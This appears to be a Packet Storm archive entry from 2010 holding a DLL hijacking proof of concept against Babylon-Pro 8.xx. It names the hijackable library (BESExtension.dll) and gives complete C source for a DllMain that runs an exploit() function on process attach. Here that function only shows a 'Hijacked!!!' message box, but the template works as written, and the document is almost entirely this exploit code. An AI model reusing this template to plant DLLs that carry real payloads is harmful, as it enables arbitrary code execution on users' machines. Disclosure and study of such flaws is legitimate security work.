Babylon-Pro 8.xx DLL Hijacking

2010-11-23T00:00:00
ID PACKETSTORM:96064
Type packetstorm
Reporter Locu
Modified 2010-11-23T00:00:00

Description

                                        
                                            `/*============ { Advisory 22/11/2010 } =============  
  
Exploit Title: Babylon-Pro 8.xx DLL Hijacking Exploit (BESExtension.dll)  
Software Link:: http://www.babylon.com  
Tested on: Windows 7 x32 and Windows xp sp3 x32  
*/  
  
#include <windows.h>  
  
BOOL WINAPI DllMain (  
HANDLE hinstDLL,  
DWORD fdwReason,  
LPVOID lpvReserved)  
{  
switch (fdwReason)  
{  
case DLL_PROCESS_ATTACH:  
  
exploit();  
  
case DLL_THREAD_ATTACH:  
case DLL_THREAD_DETACH:  
case DLL_PROCESS_DETACH:  
break;  
}  
return TRUE;  
}  
  
int exploit()  
{  
MessageBox(0, "Hijacked!!!", "DLL Message", MB_OK);  
}  
/*  
Credits:  
# Discoverd By: Locu  
# Website: http://xlocux.wordpress.com  
# Contacts: xlocux[-at-]gmail.com  
*/  
================== { EOF } =====================  
`